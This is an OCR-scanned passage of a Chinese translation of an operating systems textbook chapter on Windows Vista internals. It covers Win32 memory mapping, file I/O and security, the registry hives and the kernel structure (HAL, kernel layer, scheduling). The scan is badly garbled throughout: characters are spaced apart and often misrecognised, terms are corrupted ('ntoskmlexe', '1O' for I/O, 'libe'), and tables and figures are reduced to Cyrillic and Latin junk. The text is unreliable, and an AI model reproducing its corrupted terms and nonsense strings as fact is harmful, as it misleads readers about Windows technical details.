这 意味 着 Win32 提 供 了 一 组 非常 多 的 接口 ， 但 是 这 也 增加 了 复杂 度 ， 原 因 是 在 同一 个 API 中 精 糕 的 
系统 分 层 以 及 高 低级 别 函 数 的 混和 。 为 了 学 习 操 作 系统 ， 我 们 仅仅 关注 那些 低级 别 的 函数 封装 了 相关 的 
NT 内 核 的 API 的 Win32 API, 

Win32 有 创建 和 管理 进程 和 线程 的 调用 。Win32 也 有 许多 进程 内 部 通信 的 调用 ， 例 如 创建 、 销 毁 、 
互 不、 信号、 通信 接口 和 其 他 IPC 实 体 。 

虽然 大 量 的 内 存 管理 系统 对 程序 员 来 说 是 看 不 见 的 ， 但 是 一 个 重要 的 特征 是 可 见 的 ， 即 一 个 进程 把 
文件 映射 到 虚拟 内 存 的 一 块 区 域 上 。 这 样 允 许 线程 可 以 使 用 指针 来 读 写 部 分 文件 ， 而 不 必 执 行 在 硬盘 和 
内 存 之 间 具 体 的 读 写 数据 操作 。 通 过 内 存 映 射 ， 内 存 系统 可 以 根据 需求 来 执行 1O 操 作 (ERIT). 

Windows 处 理 内 存 映 射 文件 使 用 三 种 完全 不 同 的 手段 。 第 一 种 ， 它 提供 允许 进程 管理 它们 自己 虚 
拟 空间 的 接口 ， 包 括 预 留 地 址 范围 为 以 后 用 。 第 二 种 ，Win32 支 持 一 种 称 作文 件 映射 的 抽象 ， 这 用 来 代 
赫 可 定位 的 实体 ， 如 文件 (文件 的 映射 在 NT 的 层次 中 称 作 section) 。 通常， 文件 映射 是 使 用 文件 句柄 来 
关联 文件 。 但 有 时 候 也 用 来 指向 分 页 系统 中 的 私有 页 面 。 

第 三 种 方法 是 把 文件 映射 的 视图 映射 到 一 个 进程 的 地 址 空间 。Win32 仅 仅 允 许 为 当 前 进程 创建 一 个 
视图 ， 但 是 NT 潜在 的 手段 更 加 通用 ， 克 许 为 任 意 你 有 权限 句柄 的 进程 创建 视图 。 和 UNIX 中 的 mmap 相 
比 ， 要 区 分 开创 建文 件 映射 和 把 文件 映射 到 地 址 空间 的 操作 。 

在 Windows 中 ， 文 件 映射 的 内 核 坊 实体 被 句柄 所 取代 。 就 像 许多 句柄 一 样 ， 文 件 映射 能 够 被 复制 到 
其 他 进程 中 去 。 这 些 进程 中 的 任意 一 个 能 够 根据 需求 映射 文件 到 自己 的 地 址 空间 中 。 这 对 共享 进程 间 的 
私有 内 存 是 非常 有 用 的 ， 而 且 不 必 再 创建 文件 来 实现 。 在 NT 层 ， 文 件 的 映射 《sections) 也 和 NT 名字 空 
间 保持 一 致 ， 能 够 通过 文件 名 来 访问 。 

对 许多 程序 来 说 ， 一 个 重要 的 领域 是 文件 VO 操作 。 在 Win32 基 本 视图 中 ， 一 个 文件 仅仅 是 一 组 有 上 顺 
序 的 字 节 流 。Win32 提 供 超过 60 种 调用 来 创建 和 删除 文件 和 目录 、 打 开关 闭 文 件 、 读 写 文件 、 提 取 设置 
文件 属性 、 锁 定 字 节 流 范围 以 及 更 多 基础 操作 的 功能 ， 这 些 功能 基于 文件 系统 的 组 织 以 及 文件 的 各 自 访 
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问 权限 。 

还 有 更 高 级 的 处 理 文件 数据 的 方法 。 除 了 主要 的 文件 流 ， 存 在 NTFS 文 件 系 统 上 的 文件 可 以 拥有 额 
外 的 文件 流 。 文 件 (甚至 包括 整个 卷 ) 可 以 被 加 密 。 文 件 可 以 被 压缩 成 为 一 组 相对 稀疏 的 字 节 流 ， 从 而 
节省 磁盘 空间 。 不 同 硬盘 的 文件 系统 的 卷 可 以 通过 使 用 不 同 级 别 的 RAID 存 储 而 组 织 起 来 。 修 改 文件 或 
者 目录 可 以 通过 一 种 直接 通知 的 方式 来 实现 ， 或 者 通过 读 NTFS 为 每 个 卷 维护 的 日 志 来 实现 。 

每 个 文件 系统 的 卷 默认 挂 裁 在 NT 的 名 字 空 间 里 ， 根 据 卷 的 名 字 来 排列 ， 因 此 ， 一 个 文件 \foo\bar 可 
以 命名 成 \Device\HarddiskVolume\foo\bar。 对 于 NTFS 的 卷 来 说 ， 挂 载 点 (Windows 称 作 再 分 解 点 ) 和 符 
号 链接 用 来 帮助 组 织 卷 。 

低级 别 的 Windows IO 模式 基本 上 是 异步 的 。 一 旦 一 个 LO 操作 开始 ， 系 统 调用 将 允许 线程 对 1O 操 
作 进行 初始 化 并 且 开 始 UO 操 作 。Windows 支 持 取消 操作 ， 以 及 一 系列 的 不 同 机 制 来 支持 线程 和 UO 操 作 
完成 之 后 的 同步 。Windows 也 允许 程序 规定 在 文件 打开 时 1/O 操 作 必 须 同步 ， 许 多 库 函 数 ， 例 如 C 库 和 许 
多 Win32 调 用 ， 也 规定 1/O 的 同步 已 支持 兼容 性 或 者 简化 编程 模型 。 在 这 些 情况 下 ， 执 行 体会 在 返回 到 用 
户 态 前 和 LO 操作 结束 时 进行 同步 。 

Win32 提 供 的 另 一 些 调用 是 安全 性 相关 的 。 每 个 线程 将 和 一 个 内 核对 象 进行 捆绑 , ERFA (token), 
这 个 令 牌 提供 关于 该 线程 的 身份 和 权限 相关 的 信息 。 每 个 目标 可 以 有 一 个 ACL (访问 权限 控制 列表 ) ， 
这 个 列表 详细 描述 了 哪 种 用 户 有 权限 访问 并 且 对 其 进行 操作 。 这 种 方式 通过 了 一 种 细 粒 度 的 安全 机 制 ， 
可 以 指定 具体 哪些 用 户 可 以 或 者 禁止 访问 特定 的 对 象 。 这 种 安全 神 式 是 可 以 扩展 的 ， 允 许 应 用 程序 添加 
新 的 安全 规则 ， 例 如 限制 访问 时 间 。 

Win32 的 名 字 空 间 不 同 于 前 面 描述 的 NT 内 核 名 字 空 间 。NT 内 核 空间 仅仅 只 有 一 部 分 对 Win32 API 函 
KTR (即使 整个 NT 名 字 空 间 可 以 通过 Win32 使 用 特殊 字符 串 来 访问 ， 如 “W.")。 在 Win32 中 ， 文件 访 
问 权限 和 驱动 器 号 相关 。NT 目 录 \DosDevices 里 包含 了 对 一 个 从 驱动 器 号 到 实际 设备 对 象 的 数 个 符号 链 
接 。 例 如 ，\DosDevices\C: 是 指向 \Device\HarddiskVolume1。 这 个 目录 同样 也 包含 了 其 他 Win32 设 备 的 链 
接 ， 如 COM1:、LPT1: 和 NUL:( 端 口号 和 打印 端口 ， 以 及 非常 重要 的 空 设备 )。\DosDevices 是 一 个 真正 指 
向 \?? 的 链接 ， 这 样 有 利于 提高 效率 。 另 外 一 个 NT 文件 夹 ，\BaseNamedObjects 用 来 存储 各 种 各 样 的 内 核 
对 象 ， 这 些 文件 可 以 通过 Win32 API 来 访问 。 这 些 对 象 包括 用 来 同步 的 对 象 ， 如 信号 、 共享 内 存 、 定 时 
器 以 及 通信 端口 ，MS-DOS 和 设备 名 称 。 

对 于 底层 系统 接口 ， 我 们 额外 说 一 下 ，Win32 APIl 也 支持 许多 GUI 操 作 ， 包括 系统 所 有 图 形 接口 的 
调用 。 有 对 窗口 的 创建 、 摊 毁 、 管 理 和 使 用 的 调用 ， 以 及 支持 菜单 、 工 具 条 、 状 态 栏 、 滚 动 条 、 对 话 框 、 
图 标 和 许多 在 屏幕 上 显示 的 元 素 。Win32 还 提供 调用 来 画 几何 图 形 、 填 充 、 使 用 调 色 板 、 处 理 文 字 以 及 
在 屏幕 上 放置 图 标 等 。 也 支持 对 键盘 鼠标 和 其 他 输入 设备 的 响应 ， 如 音频 、 打 印 等 其 他 输出 设备 。 

GUI 操作 直接 使 用 win32k sys 驱动 ， 这 个 驱动 使 用 特殊 的 函数 从 用 户 态 去 访问 内 核 态 的 接口 。 因为 
这 些 调用 不 包含 NT 操作 系统 中 的 系统 调用 ， 我 们 将 不 会 详细 讨论 。 

11.2.3 Windows 注册 表 

名 字 空 间 的 根 在 内 核 中 维护 。 存 储 设备 ， 如 系统 的 卷 ， 附 属于 名 字 空间 中 。 因为 名 字 空 间 会 因为 系 
统 的 每 次 启动 重新 构建 ， 那 么 系统 怎么 知道 系统 配置 的 细节 呢 ? 答案 就 是 Windows 会 挂 载 一 种 特殊 的 文 
件 系 统 (为 小 文件 做 了 优化 ) 到 名 字 空 间 。 这 个 文件 系统 称 作 注册 表 (registry), 注册 表 被 组 织 成 了 不 
FIR, ERR (hive)。 每 个 储 条 保存 在 一 个 单独 文件 中 (在 启动 卷 的 目录 C:\Windows\ system32\ 
config\ 下 ) 。 当 Windows 系 统 启 动 时 ， 一 个 叫做 SYSTEM 的 特殊 储 集 被 装 入 了 内 存 ， 这 是 由 同样 的 装载 
内 核 和 其 他 启动 文件 (例如 位 于 启动 盘 的 驱动 程序 ) 的 程序 来 完成 。 

Windows 在 系统 储 时 里 面 保存 了 大 量 的 重要 信息 ， 包 括 驱动 程序 去 驱使 什么 设备 工作 ， 什么 软件 进 
行 初始 化 ， 以 及 什么 变量 来 控制 操作 系统 的 操作 等 。 这 些 信息 其 至 被 启动 程序 自己 用 来 决定 哪些 驱动 程 
序 是 用 于 启动 的 驱动 ， 哪 些 必须 立即 需要 启动 。 这 些 驱 动 包括 操作 系统 自身 来 识别 文件 系统 和 磁盘 驱动 
的 程序 。 

其 他 配置 储 巢 用 在 系统 启动 后 ， 描 述 系统 安装 的 软件 的 信息 ， 特别 是 用 户 和 用 户 态 下 安装 在 系统 上 
的 COM (Component Object-Model)。 本 地 用 户 的 登录 信息 保存 在 SAM (安全 访问 管理 器 ) 中 。 网 络 用 
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户 的 信息 保存 在 lsass 服 务 中 ， 和 网 络 服务 器 文件 夹 一 起 ， 用 户 可 以 通过 上 述 两 种 配置 拥有 一 个 访问 网 络 


的 用 户 名 和 密码 。Windows Vista 的 储 集 列表 在 图 11-11 中 显示 。 
РАШ __ ВАв 使 用 Шы; 
SYSTEM HKLMTEM OS 配置 信息 ， 供 内 核 使 用 
HARDWARE | HKLMDWARE ELET Е 
[Beco |HKLMBCD: 启动 配置 数据 库 
SAM HKLM _ 本 地 用 账户 信息 
| SECURITY HKLMURITY lass 的 账号 和 其 他 信息 
DEFAULT ”| HKEY_USERS .DEFAULT | 新 用 户 的 默认 储 梨 
NTUSER.DAT | HKEY_USERS <user id> 上 全 上， 保存 在 home 目 录 
SOFTWARE HKLM TWARE COM 注 册 的 应 用 类 
COMPONENTS | HKLMNENTS SYS 组 件 的 清单 和 依赖 | 


Р-п Windows Vista 中 的 注册 表 储 梨 。HKLM 是 HKEY_LOCAL_MACHINE 的 缩写 


在 引入 注册 表 之 前 ，Windows 的 配置 信息 保存 在 大 量 的 ,ini 文件 里 ， 分 散在 硬盘 的 各 个 地 方 。 注 册 
表 则 把 这 些 文件 集中 存储 ， 使 得 这 些 文件 可 以 在 系统 启动 的 过 程 中 引用 。 这 对 Windows 热 插 拔 功 能 是 很 
重要 的 。 但 是 ， 随 着 Windows 的 发 展 ， 注 册 表 已 经 变 得 无 序 。 有 些 关 于 配置 的 信息 的 协议 定义 得 很 差 ， 
而 且 很 多 应 用 程序 采取 了 特殊 的 方法 。 许 多 用 户 、 应 用 程序 以 及 所 有 驱动 程序 在 运行 时 具有 私有 权限 ， 
而 且 经 常 直接 更 改 注册 表 的 系统 参数 一 一 有 时 候 会 妨碍 其 他 程序 导致 系统 不 稳定 。 

注册 表 是 位 于 数据 库 和 文件 系统 之 间 的 一 个 交叉 点 ， 但 是 和 每 一 个 都 不 像 。 有 整 本 描写 注册 表 的 书 
(Born, 1998;Hipson, 2000;Ivens 1998)。 有 很 多 公司 开发 了 特殊 的 软件 去 管理 复杂 的 注册 表 。 

regedit 能 够 以 图 形 窗口 的 方式 来 浏览 注册 表 ， 这 个 工具 允许 你 查看 其 中 的 文件 夹 ( 称 作 键 )》 和 数据 
Ж ( 称 作 值 )。 微 软 的 新 PowerShell 脚 本 语言 对 于 扎 历 注册 表 的 键 和 值 是 非常 有 用 的 ， 它 把 这 些 键 和 值 以 
类 似 目录 的 方式 来 看 待 。Procmon 是 一 个 比较 有 趣 的 工具 ， 可 以 从 微软 工具 网 站 ，www.microsoft com/ 
technet/sysinternals 中 找到 它 。 

Procmon 监 视 系统 中 所 有 对 注册 表 的 访问 。 有 时， 一 些 程序 可 能 会 重复 访问 同一 个 键 达 数 万 次 之 多 。 

正如 名 字 所 显示 的 那样 ， 注 册 表 编辑 器 允许 用 户 对 注册 表 进 行 编辑 ， 但 是 一 旦 你 这 么 做 就 必须 非常 
小 心 。 它 很 容易 造成 系统 无 法 引导 或 损坏 应 用 软件 的 安装 ， 因 此 没有 一 些 专业 技巧 就 不 要 去 修改 它 。 微 
软 承诺 会 在 以 后 发 布 时 清理 注册 表 ， 但 现在 它 仍 是 庞杂 的 一 堆 一 一 比 UNIX 保 留 的 配置 信息 复杂 得 多 。 

微软 Windows Vista 已 经 引入 了 一 个 基于 事务 管理 的 内 核 ， 用 来 支持 对 跨越 文件 系统 和 注册 表 操作 
的 事务 进行 协调 。 微 软 计划 在 未 来 使 用 该 功能 以 避免 由 于 软件 非 完全 正确 安装 而 在 系统 目录 和 注册 表 储 
巢 中 留 下 当时 局 部 状态 信息 所 造成 的 元 数据 说 用 问题 。 

Win32 程 序 员 通过 函数 调用 可 以 很 方便 地 访问 


注册 表 ， 包 括 创建 、 删 除 键 、 查 询 键 值 等 。 如 图 | Win32 API Eat жи 

11-12 所 示 。 RegCreateKeyEx 创建 атана 
当 系 统 关闭 时 ， 大 部 分 的 注册 去 信息 被 存储 在 | Resp наан 

ди. амаа чылыы [RegEnumKeyEx 列举 菜 个 键 的 下 级 副 刍 

纠正 系统 功能 ， 自 动 实现 备份 ， 将 元 数据 冲 写 入 硬 касос ЗЕЕ 

а Нива сени, Е 一 一 

损坏 需要 重新 安装 系统 上 的 所 有 软件 。 图 11-12 一 些 使 用 注册 表 的 Win32 АРІ 调用 

11.3 系统 结构 


前 面 的 章节 从 用 户 态 下 程序 员 写 代码 的 角度 研究 了 Windows Vista 系 统 。 现 在 我 们 将 观察 系统 是 如 
何 组 织 的 ， 不 同 的 部 件 承担 什么 工作 以 及 它们 彼此 间或 者 和 用 户 程序 间 是 如 何 配合 的 。 这 是 实现 底层 用 
户 态 代码 的 程序 开发 人 员 所 能 看 见 的 操作 系统 部 分 ， 类 似 于 子 系统 和 本 地 服务 ， 以 及 提供 给 设备 驱动 各 
序 开发 者 的 系统 视图 。 
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尽管 有 很 多 关于 Windows 使 用 方面 的 书籍 ， 但 很 少 有 书 讲述 它 是 如 何 工作 的 。 不 过 ， 查 阅 
{Microsoft Windows Internals, 4th ed》(Russionvich 和 Solomon, 2004) 是 其 中 最 好 的 选择 之 一 。 该 书 
描述 的 虽然 是 Windows XP， 但 大 部 分 的 描述 还 是 准确 的 。 就 内 部 机 制 而 言 ，Windows XP 和 Windows 

常 相近 的 。 

而 且 ， 微 软 通过 Windows 学 术 计划 为 大 学 教员 和 学 生 提供 对 其 有 帮助 的 Windows 内 核 信息 。 该 计划 
会 发 布 大 部 分 Windows Server 2003 内 核 源 代码 、 Cutler 团 队 的 原始 NT 设计 文档 和 一 大 套 源 自 Windows 
Internals 书籍 的 表述 资料 。 另 外 ，Windows 驱 动工 具 也 会 提供 大 量 内 核 工作 信息 ， 因 为 设备 驱动 器 不 仅 
使 用 MO 设备 ， 还 需要 使 用 进程 、 线 程 、 虚 拟 内 存 和 进程 间 的 通信 等 。 


11.3.1 操作 系统 结构 

Windows Vista 操作 系统 包括 很 多 层 ， 如 图 11-6 所 示 。 在 以 下 章节 我 们 将 研究 操作 系统 中 工作 于 内 
核 态 的 最 底 级 层次 。 其 中 心 就 是 NOTS 内 核 层 自身 ， 当 Windows 启 动 时 由 ntoskmlexe 加 载 。NTOS 包 括 两 
层 ，executive (执行 体 ) 提供 大 部 分 的 服务 ， 另 一 个 较 小 的 层 称 为 内 核 (kernel) ， 负 责 实现 基础 线程 
计划 和 同步 抽象 ， 同 时 也 执行 陷入 句柄 中 断 以 及 管理 CPU 的 其 他 方面 。 

将 NTOS 分 为 内 核 和 执行 体 体现 了 NT 的 VAX/VMS 根 源 。VMS 操 作 系统 也 是 由 Cutler 团 队 设计 的 ， 可 
分 为 4 个 由 硬件 实施 的 屋 次 ， 用户、 管理 程序 、 执 行 体 和 内 核 ， 与 VAX 处 理 机 结构 提供 的 4 种 保护 模式 一 
90. Intel CPU 也 支持 这 4 种 保护 环 ， 但 是 一 些 早期 的 NT 处 理 机 对 此 不 支持 ， 因此 内 核 和 执行 体 表现 了 由 
软件 实施 的 抽象 ， 同 时 VMS 在 管理 者 模式 下 提供 的 功能 ， 如 假 脱 机 打印 ， NT 是 作为 用 户 态 服 务 提供 的 。 

NT 的 内 核 态 层 如 图 11-13 所 示 。NTOS 的 内 核 层 在 执行 体 层 之 上 ， 因为 它 实 现 了 从 用 户 态 到 内 核 态 
转换 的 陷入 和 中 断 机 制 。 图 11-13 所 示 的 最 顶层 是 系统 库 ntdll.dll， 它 实际 工作 于 用 户 态 。 系统 库 包 括 许 
多 为 编译 器 运行 提供 的 支持 功能 以 及 低级 库 ， 类 似 于 UNIX 中 的 libe。Ntdll.dll 也 包括 了 特殊 码 输入 指针 
以 支持 内 核 初始 化 线程 、 分 发 异常 和 用 户 态 的 异步 过 程 调用 (Asynchronous Procedure Calls，APC) 等 。 


因为 系统 库 对 内 核 运行 的 ， 所 以 每 个 由 NTOS 创 建 的 用 户 态 进程 都 具有 相同 固定 地 址 描绘 的 ntdll。 
当 NTOS 初 始 化 系统 时 ， 会 创建 一 个 局 部 目标 并 且 记录 下 内 核 使 用 的 ntdll 输 入 指针 地 址 。 

用 户 态 系统 库 核心 用 户 态 分 派 例 程 (ntdll.dll) 

тв 陷阱 /异常 /中 断 分 配 


CPU 调度 和 同步 ; 线程 、ISRs、DPCs、APCs 


进程 和 线程 | ”虚拟 内 存 | 对 象 管理 器 | 配置 管理 器 
LPC marres] VO 管理 器 ]| 安全 监视 器 
ЗЕЕ 
NTOS 执 行 体 层 


| 


硬件 抽象 层 
硬件 CPU、MMU、 中 断 控制 器 、 内 存 、 物 理 设备 、BIOS 


图 11-13 Windows 内 核 态 组 织 结构 


在 NTOS 内 核 和 执行 体 层 之 下 是 称 为 硬件 抽象 层 【Hardware Abstraction Layer, HAL) 的 软件 ， 该 
软件 对 类 似 于 设备 寄存 器 存 取 和 DMA 操 作 之 类 的 底层 硬件 信息 进行 抽象 ， 同时 还 就 BIOS 固 件 是 如 何 表 
述 配置 信息 和 处 理 CPU 芯 片上 的 不 同 (如 各 种 中 断 控制 器 ) 进行 抽象 。 BIOS 可 以 从 很 多 公司 获得 ， 并 
且 被 集成 为 计算 机 母 板 上 的 永久 内 存 。 

内 核 态 下 另 一 个 主要 部 件 就 是 设备 驱动 器 。 Windows 内 核 态 下 任何 非 NTOS 或 HAL 的 设备 都 会 用 到 
设备 蝶 动 器 ， 包 括 文件 系统 、 网 络 协 议 栈 和 其 他 如 防 病毒 程序 、 DRM 软 件 之 类 的 内 核 扩展 ， 以 及 与 硬 
件 总 线 接口 的 管理 物理 设备 驱动 器 等 。 
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1/O 和 虚拟 内 存 部 件 协作 加 载 设备 驱动 程序 至 内 核 存储 器 并 将 它们 连接 到 NTOS 和 HAL 层 。I/O 管 理 
器 提供 发 现 、 组 织 和 操作 设备 的 接口 ， 包 括 安排 加 载 适当 的 设备 驱动 程序 等 。 大 多 数 管理 设备 和 驱动 器 
的 配置 信息 都 保留 在 注册 表 的 系统 储 昧 中 。I/O 管 理 器 的 即 插 即 用 下 层 部 件 保留 硬件 储 巢 内 检测 出 的 硬 
件 信息 ， 该 储 蘑 是 保留 在 内 存 中 的 可 变 储 某 而 非 存在 于 硬盘 中 ， 系 统 每 次 引导 都 会 重新 创建 。 

以 下 将 详细 介绍 操作 系统 的 不 同 部 件 。 

1. 硬件 抽象 层 

正如 之 前 发 布 的 基于 NT 的 Windows 系 统一 样 ，Windows Vista 的 目标 之 一 是 使 得 操作 系统 在 不 同 的 
硬件 平台 之 间 具 有 可 移植 性 。 理 想 情况 下 ， 如 果 需 要 在 一 种 新 型 计算 机 系统 中 运行 该 操作 系统 ， 仅 仅 需 
要 在 首次 运行 时 使 用 新 机 器 编译 器 重新 编译 操作 系统 即 可 。 但 实际 上 并 没有 那么 简单 。 操 作 系 统 各 层 有 
大 量 部 件 具 有 很 好 的 可 移植 性 (因为 它们 主要 处 理 支持 编程 模式 的 内 部 数据 结构 和 抽象 ， 从 而 支持 特定 
的 编 成 模式 )， 其 他 层 就 必须 处 理 设备 寄存 器 、 中 断 、DMA 以 及 机 器 与 机 器 间 显著 不 同 的 其 他 硬件 特征 。 

大 多 数 NTOS 内 核 源 代码 由 C 语 言 编写 而 非 汇编 语言 (x86 中 仅 2% 是 汇编 语言 ， 比 x64 少 1% )。 然 而 ， 
所 有 这 些 C 语 言 代码 都 不 能 简单 地 从 x86 系 统 中 移植 到 一 个 SPARC 系 统 ， 然 后 重新 编译 、 重 新 引导 ， 
为 与 不 同 指令 集 无 关 并 且 不 能 被 编译 器 隐藏 的 处 理 机 结构 及 其 硬件 有 很 多 不 同 。 像 C 这 样 的 语言 难以 抽 
象 硬 件数 据 结构 和 参数 ， 如 页 表 输 入 格式 、 物 理 存储 页 大 小 和 字 长 等 。 所 有 这 些 以 及 大 量 的 特定 硬件 的 
优化 即使 不 用 汇编 语言 编写 ， 也 将 不 得 不 手工 处 理 。 

大 型 服务 器 的 内 存 如 何 组 织 或 者 何 种 硬件 同步 基 元 是 可 获得 的 ， 与 此 相关 的 硬件 细节 对 系统 较 高 层 
都 有 比较 大 的 影响 。 例 如 ，NT 的 虚拟 内 存 管理 器 和 内 核 层 了 解 涉及 内 存 和 内 存 位 置 的 硬件 细节 。 在 整 
个 系统 中 ，NT 使 用 的 是 比较 和 交换 同步 基 元 ， 对 于 没有 这 些 基 元 的 系统 是 很 难 移植 上 去 的 。 最 后 ， 系 
统 对 字 内 的 字 节 分 类 系统 存在 很 多 相关 性 。 在 所 有 NT 原来 移植 到 的 平台 上 ， 硬 件 是 设置 为 小 端 (little- 
endian) 模式 的 。 

除了 以 上 这 些 影响 便携 性 的 较 大 问题 外 ， 不 同 制造 商 的 不 同 母 板 还 存在 大 量 的 小 问题 。CPU 版 本 的 
不 同 会 影响 同步 基 元 的 实现 方式 。 各 种 支持 芯片 组 也 会 在 硬件 中 断 的 优先 次 序 、1/O 设 备 寄存 器 的 存 取 、 
DMA 转 换 管理 、 定 时 器 和 实时 时 钟 控制 、 多 处 理 器 同步 、BIOS 设 备 (如 ACPD 的 工作 等 方面 产生 差异 。 
微软 尝试 通过 最 下 端的 HAL 层 隐藏 对 这 些 设备 类 型 的 依赖 。HAL 的 工作 就 是 对 这 些 硬件 进行 抽象 ， 隐 藏 
处 理 器 版 本 、 支 持 芯片 集 和 其 他 配置 变更 等 具体 细节 。 这 些 HAL 抽 象 展现 为 NTOS 和 驱动 可 用 的 独立 于 
机 器 的 服务 。 

使 用 HAL 服 务 而 不 直接 写 硬件 地 址 ， 驱 动 器 和 内 核 在 与 新 处 理 器 通信 时 只 需要 较 小 改变 ， 而 且 在 多 数 
情况 下 ， 尽 管 版 本 和 支持 芯片 集 不 同 但 只 要 有 相同 的 处 理 器 结构 ， 系 统 中 所 有 部 件 均 无 需 修改 就 可 运行 。 

HAL 对 诸如 键盘 、 和 鼠标、 硬盘 等 特殊 的 /0 设备 或 内 存 管理 单元 不 提供 抽象 或 服务 。 这 种 抽象 功能 
广泛 应 用 于 整个 内 核 态 的 各 部 件 ， 如 果 没 有 HAL， 通 信 时 即使 硬件 间 很 小 的 差异 也 会 造成 大 量 代码 的 重 
大 修改 。HAL 自 身 的 通信 很 简单 ， 因 为 所 有 与 机 器 相关 的 代码 都 集中 在 一 个 地 方 ， 移 植 的 目标 就 很 容易 
确定 ， 即 实现 所 有 的 HAL 服 务 。 很 多 版 本 中 ， 微 软 都 支持 HAL 扩 展 工具 包 ， 人 允许 系统 制造 者 生产 各 自 的 
HAL 从 而 使 得 其 他 内 核 部 件 在 新 系统 中 无 需 更 改 即 可 工作 ， 当 然 这 要 在 硬件 更 改 不 是 很 大 的 前 提 下 。 

通过 内 存 映 射 10 与 VO 端口 的 对 比 可 以 更 好 地 了 解 硬 件 抽象 层 是 如 何 工作 的 。 一 些 机 器 有 内 存 映射 
LO， 而 有 的 机 器 有 IO 端口 。 驱 动 程序 是 如 何 编写 的 呢 ? 是 不 是 使 用 内 存 映射 1O? 无 需 强 制 做 出 选择 ， 
只 需要 判断 哪 种 方式 使 驱动 程序 可 独立 于 机 器 运行 即 可 。 硬 件 抽象 层 为 驱动 程序 编写 者 分 别提 供 了 三 种 
读 、 写 设备 寄存 器 的 程序 : 

uc=READ_PORT_UCHAR(port); WRITE_PORT_UCHAR(port,uc); 

us=READ_PORT_USHORT(port); WRITE_PORT_ USHORT (port,us); 

UI=READ_PORT_ULONG(port); WRITE_PORT_ULONG(port,ul); 
这 些 程序 各 自在 指定 端口 读 、 写 无 符号 8、16、32 位 整数 ， 由 硬件 抽象 层 决定 这 是 否 需要 内 存 映射 11/0。 
这 样 ， 驱 动 程序 可 以 在 设备 寄存 器 实现 方式 有 差异 的 机 器 间 使 用 而 不 需要 修改 。 

驱动 程序 会 因为 不 同 目的 而 频繁 存 取 特 定 的 1/O 设 备 。 在 硬件 层 ， 一 个 设备 在 确定 的 总 线 上 有 一 个 
或 多 个 地 址 。 因 为 现代 计算 机 通常 有 多 个 总 线 (ISA、PCI、PCI-X、USB、1394 等 )， 这 就 可 能 造成 不 
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同 总 线 上 的 多 个 设备 有 相同 的 地 址 ， 因 此 需要 一 些 方法 来 区 别 它们 。HAL 把 与 总 线 相 关 的 设备 地 址 映射 
为 系统 逻辑 地 址 并 以 此 来 区 分 设备 。 这 样 ， 驱 动 程序 就 无 需 知道 何 种 设备 与 何 种 总 线 相 关联 。 这 种 机 制 
也 保护 了 较 高 层 避免 进行 总 线 结构 和 地 址 规约 的 交替 。 

中 断 也 存在 相似 的 问题 一 一 总 线 依赖 性 。HAL 同样 提供 服务 在 系统 范围 内 命名 中 断 ， 并 且 人 允许 驱 
动 程序 将 中 断 服务 程序 附 在 中 断 内 而 无 需 知道 中 断 向 量 与 总 线 的 关系 。 中 断 请 求 管理 也 受 HAL 控 制 。 

HAL 提 供 的 另 一 个 服务 是 在 设备 无 关 方式 下 建立 和 管理 DMA 转 换 ， 对 系统 范围 和 专用 I/O 卡 的 
DMA 引 擎 进行 控制 。 设 备 由 其 逻辑 地 址 指示 。HAL 实 现 软件 的 散布 /聚合 (从 不 相 邻 的 物理 内 存 块 的 地 
方 写 或 者 读 )。 

HAL 也 是 以 用 一 种 可 移植 的 方式 来 管理 时 钟 和 定时 器 的 。 定 时 器 是 以 100 纳 秒 为 单位 从 1601 年 1 月 1 
日 开始 计数 的 ， 因 为 这 是 1601 年 的 第 一 天 ， 简 化 了 半年 的 计算 。( 一 个 简单 而 试 : 1800 年 是 闽 年 吗 ? 答 
Ж: 不 是 。) 定时 器 服务 和 驱动 程序 中 的 时 钟 运行 的 频率 是 解 看 合 的 。 

有 时 需要 在 底层 实现 内 核 部 件 的 同步 ， 尤 其 是 为 了 防止 多 处 理 机 系统 中 的 竞争 环境 。HAL 提 供 基 元 管 
理 同 步 ， 如 旋转 锁 ， 此 时 一 个 CPU 等 待 其 他 CPU 释放 资源 ， 比 较 特殊 的 情况 是 资源 被 几 个 机 器 指令 占有 。 

最 终 ， 系 统 引导 后 ，HAL 和 BIOS 通 信 ， 检 查 系统 配置 信息 以 查 明 系统 所 包含 的 总 线 、1/O 设 备 及 其 
配置 情况 ， 同 时 该 信息 被 添加 进 注册 表 。HAL 工 作 情 况 摘要 如 图 11-14 所 示 。 
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硬件 抽象 层 
图 11-14 一 些 HAL 管 理 相关 的 硬件 功能 


2. 内 核 层 

在 硬件 抽象 层 之 上 是 NTOS， 包括 两 层 :内核 和 执行 体 。.“ 内 核 ” 在 Windows 中 是 一 个 易 混淆 的 术语 。 
它 可 以 指 运行 在 处 理 机 内 核 态 下 的 所 有 代码 ， 也 可 以 指 包 含 了 Windows 操 作 系统 核心 NTOS 的 
ntoskrmnl.exe 文 件 ， 还 可 以 指 NTOS 里 的 内 核 层 ， 在 本 章 中 我 们 使 用 这 个 概念 。 此 外 ,“ 内 核 ”甚至 用 来 命 
名 用 户 态 下 提供 本 地 系统 调用 的 封装 器 的 Win32 库 : kermel32.d11 

Windows 操 作 系统 的 内 核 层 (如 图 11-13 所 示 ， 执行 体 之 上 ) 提供 了 一 套 管理 CPU 的 抽象 。 最 核心 
的 抽象 是 线程 ， 但 是 内 核 也 实现 了 异常 处 理 、 陷 阱 以 及 各 种 中 断 。 支持 线程 的 数据 结构 的 创建 和 终止 是 
在 执行 体 实 现 的 。 核 心 层 负责 调度 和 同步 线程 。 在 一 个 单独 的 层 内 支持 线程 ， 允许 执行 体 在 用 户 态 下 ， 
可 以 通过 使 用 用 来 编写 并 行 代码 且 相同 优先 级 的 多 线程 模型 来 执行 但 同步 原 语 的 执行 更 专业 。 

内 核 线程 调度 程序 负责 决定 哪些 线程 执行 在 系统 的 每 一 个 CPU 上 。 线程 会 一 直 执行 ， 直 到 产生 了 一 
个 定时 器 中 断 ， 或 者 是 当 线程 需要 等 待 一 些 情 况 ， 比如 等 待 一 个 IO 读 写 完成 或 是 一 个 锁定 被 释放 ， 或 
者 是 更 高 优先 级 的 线程 等 待 运行 而 需要 CPU ， 这 时 正在 执行 的 线程 会 切换 到 另 一 个 线程 (量子 过 期 )。 
当 一 个 线程 向 另 一 个 线程 转换 时 ， 调 度 程序 会 在 CPU 上 运行 ， 并 确保 寄存 器 及 其 他 硬件 状态 已 保存 。 然 
后 ， 调 度 程 序 会 选择 另 一 个 线程 在 CPU 上 运行 ， 并 且 恢复 之 前 所 保存 的 最 后 一 个 线程 的 运行 状态 。 

